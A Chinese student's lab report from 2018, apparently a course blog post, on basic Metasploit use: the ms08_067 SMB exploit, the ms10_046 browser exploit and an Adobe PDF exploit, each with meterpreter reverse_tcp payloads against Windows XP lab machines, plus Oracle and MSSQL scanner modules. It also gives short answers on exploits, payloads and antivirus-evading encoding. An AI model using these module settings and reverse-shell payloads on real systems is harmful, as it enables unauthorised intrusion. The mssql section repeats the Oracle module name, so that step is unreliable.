20154319 实验五 MSF基础应用

 

一、实验内容

(1)一个主动攻击,如ms08_067;

(2) 一个针对浏览器的攻击,如ms11_050;

(3)一个针对客户端的攻击,如Adobe;

(4)成功应用任何一个辅助模块。

二、实验后问题回答

(1)用自己的话解释什么是exploit,payload,encode。

Exploit就是漏洞利用,有exploit肯定有漏洞,所以渗透攻击就是利用一个系统、应用或服务中的安全漏洞进行攻击;

Payload就是有效载荷,在渗透攻击后植入目标系统执行代码。

Encode就是编码,通过改变特征码,对攻击载荷进行“免杀”处理。

(2)离实战还缺些什么技术或步骤?

我觉得离实战还远得很啊,一是靶机是很低很低的Windowsxp系统,浏览器IE版本也很低,在虚拟机上打开网页的时候都会提醒要更新了,实际上的电脑应该不会有这么低版本的,也看到有同学利用了新的漏洞攻击了Windows7的系统,我也查找了一些其他的漏洞,还是因为自己的技术太低没有完成。二是在攻击浏览器的时候,需要靶机访问生成的网址,实战中那么明显的IP网址一般不会轻易访问,还是要进行伪装。

三、实验体会

这次实验是使用漏洞攻击,真的是做的特别的艰难了,自己的垃圾电脑带不起来两个虚拟机,跟同学合作用两台虚拟机经常ping不通(防火墙也关了,抓取ping包那个也设置了也不行),最后直接借了一台高配置的电脑完成一部分,心累啊~在实验中觉得要注意一下:一是配置的时候常用show options看看配置有没有错,有时候晕了的时候会把攻击的IP和靶机的设置反了,或者是有端口号会变之类的问题;二是看看Linux和win虚拟机能不能ping通。

四、实践过程

(一)windows服务渗透攻击(MS08-067漏洞攻击)

1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.236

2.启动msf终端。

使用search命令搜索该漏洞对应的模块:(可以看到漏洞的时间是2008年的)

 

启用该渗透攻击模块,选择运行后门回连控制端的攻击载荷,配置渗透攻击所需的配置项:

启用 :use exploit/windows/smb/ms08_067_netapi 

设置渗透目标IP: set RHOST 10.1.1.236 

设置攻击机端口: set LPORT 4319 

设置攻击机IP: set LHOST 10.1.1.242 

设置目标系统类型: set target 0 

 

3.发起渗透攻击显示攻击成功后,在攻击机上执行ipconfig命令验证结果,可以执行:

 

 

(二)浏览器渗透攻击(ms10_046漏洞攻击)

1.启动msf终端,使用search命令搜索该漏洞对应的模块:

 

2. 启用该渗透攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dlloader 

选择运行后门回连控制端的攻击载荷,用 show payloads

设置攻击载荷为: set paylod windows/meterpreter/reverse_tcp 

配置渗透攻击所需的配置项: show options 

设置服务器地址: set SRVHOST 192.168.43.6 

设置端口: set LPORT 4319 

设置靶机IP: set LHOST 192.168.42.134 

设置完成后键入 exploit 发起攻击:

上图我错误的设置了URIPATH为4319,应该为默认的“/”,修改后重新运行

 

 

生成一个URL 地址:http://192.168.43.6:80/

3.在靶机中启动IE浏览器,访问链接http://192.168.43.6:80/

在攻击机MSF终端中可以看到如下信息:

可以看到从靶机传来的很多数据。

而在靶机的网页上回生成两个文件:

 

4.使用sessions-l命令查看当前监听端的活动会话。

运行 sessions  命令,查看当前的会话信息

 

奇怪的是我查看了会话信息并没有会话,但是之前明明收到来自靶机的信息,然后回到靶机上查看,发现是靶机卡住了,网页没有响应,然后我的整个电脑都卡住了,最后只能强制关机了,但已经能看到从靶机传回来的数据,所以算是成功了 

 

(三)Adobe阅读器渗透攻击

1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.190

2.启动msf终端。

配置渗透攻击所需的配置项:

设置载荷: set payload windows/meterpreter/reverse_tcp 

设置攻击机IP: set LHOST 10.1.1.242 

设置端口: set LPORT 8443 

设置产生的文件: set FILENAME 4319.pdf 

设置完成后键入 exploit 

 

3.根据路径找到该pdf文件放到靶机里。

4.使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连,并执行 exploit 

5.在靶机中双击打开该文件,监听端接到来自靶机的Meterpreter连接,输入命令 sysinfo ,可对靶机环境进行基本的查询,攻击成功:

 

 

(四)Oracle数据库服务查点

各种网络数据库的网络服务端口是漏洞频发的“重灾区”,比如Microsoft SQL Server的1433端口(第五部分),以及Oracle SQL监听器(tnslsnr)使用的1521端口。可以使用mssql_ping模块查找网络中的Microsoft SQL Server,使用tnslsnr_version模块查找网络中开放端口的Oracle监听器服务。

1.使用  use auxiliary/scanner/oracle/tnslsnr_version  模块查找网络中开发端口的Oracle监听器服务。

2.设置相关配置项:(先用 show options 查看要设置的内容)

设置扫描区段: set RHOST 172.30.4.0/24 

设置线程: set THREADS 50 

命令 run 开始扫描,扫描完成,但没有在网络中发现后台服务器上开放的Oracle数据库。

 

(五)mssql扫描

配置不当的MS SQL通常是进入目标系统的第一个后门。

MS SQL安装后,默认监听在TCP端口1433或使用随机的动态TCP端口。随机情况下,使用mssql_ping模块,获取随机的TCP端口。

当Metasploit发现MS SQL服务器后,他会将所有能够获取的关于服务器的信息都显示出来。

1.使用  use auxiliary/scanner/oracle/tnslsnr_version 模块

2.设置相关配置项:(先用 show options 查看要设置的内容)

设置扫描区段: set RHOST 172.30.4.0/24 

设置线程: set THREADS 50 

命令 run 开始扫描,扫描完成,也没有发现数据库。

 

posted on 2018-04-18 17:34  154319张武璐  阅读(544)  评论(0编辑  收藏  举报

导航